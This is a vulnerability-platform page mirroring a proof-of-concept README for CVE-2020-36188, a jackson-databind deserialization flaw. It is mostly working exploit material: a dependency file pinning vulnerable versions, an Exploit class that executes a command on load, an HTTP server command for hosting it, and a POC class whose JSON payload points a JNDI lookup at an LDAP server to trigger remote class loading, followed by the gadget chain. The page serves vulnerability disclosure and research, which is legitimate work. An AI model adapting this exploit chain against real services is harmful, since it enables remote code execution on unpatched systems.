漏洞平台

POC详情： fa54f4043c0b6bcab9ee20cfdc5fea129e288db2

来源

https://github.com/Al1ex/CVE-2020-36188

关联漏洞

标题： FasterXML jackson-databind 代码问题漏洞 (CVE-2020-36188)
描述：FasterXML jackson-databind是一个基于JAVA可以将XML和JSON等数据格式与JAVA对象进行转换的库。Jackson可以轻松的将Java对象转换成json对象和xml文档，同样也可以将json、xml转换成Java对象。 FasterXML jackson-databind 2.x before 2.9.10.8 存在代码问题漏洞，该漏洞源于com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource错误

描述

CVE-2020-36188 &&Jackson-databind RCE

介绍

## Description
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource

## How to RCE

pom.xml

```
<dependencies>
        <dependency>
            <groupId>com.fasterxml.jackson.core</groupId>
            <artifactId>jackson-databind</artifactId>
            <version>2.9.10.7</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/com.newrelic.agent.java/newrelic-agent -->
        <dependency>
            <groupId>com.newrelic.agent.java</groupId>
            <artifactId>newrelic-agent</artifactId>
            <version>4.9.0</version>
        </dependency>

        <dependency>
            <groupId>org.slf4j</groupId>
            <artifactId>slf4j-nop</artifactId>
            <version>1.7.2</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
        <dependency>
            <groupId>javax.transaction</groupId>
            <artifactId>jta</artifactId>
            <version>1.1</version>
        </dependency>
    </dependencies>
	
```

Exploit.java


```
import java.lang.Runtime;

public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```

HttpServer

```
python -m  SimpleHTTPServer 4444

```

LDAPServer

![ldap](img/ldap.png)

POC.java
```
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;


public class POC {
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();
        mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
        String json = "[\"com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource\", {\"jndiLocation\":\"ldap://127.0.0.1:1288/Exploit\"}]";
        Object obj = mapper.readValue(json, Object.class);
        mapper.writeValueAsString(obj);

    }
}
```

Result:

![result](img/result.jpg)


## Gadget Chain

```
JNDIConnectionSource
	->setJndiLocation
    	->getConnection
        	->lookupDataSource
            	->lookup()
```

文件快照


 [4.0K]  /data/pocs/fa54f4043c0b6bcab9ee20cfdc5fea129e288db2
├── [4.0K]  img
│   ├── [9.8K]  ldap.png
│   └── [235K]  result.jpg
└── [2.3K]  README.md

1 directory, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。